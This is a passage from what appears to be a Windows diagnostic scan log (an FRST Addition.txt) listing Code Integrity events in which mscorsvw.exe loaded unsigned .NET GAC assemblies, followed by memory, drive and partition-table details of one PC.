    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:36.113
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.470
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:54:35.328
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.676
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

    Date: 2016-02-13 23:51:19.646
    Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


    ==================== Memory info ===========================

    Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
    Percentage of memory in use: 21%
    Total physical RAM: 16271.13 MB
    Available physical RAM: 12742.79 MB
    Total Virtual: 32655.13 MB
    Available Virtual: 28445.88 MB

    ==================== Drives ================================

    Drive c: () (Fixed) (Total:111.69 GB) (Free:16.26 GB) NTFS ==>[drive with boot components (obtained from BCD)]
    Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.14 GB) NTFS
    Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
    Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
    Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

    ========================================================
    Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
    Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

    ==================== End of Addition.txt ============================
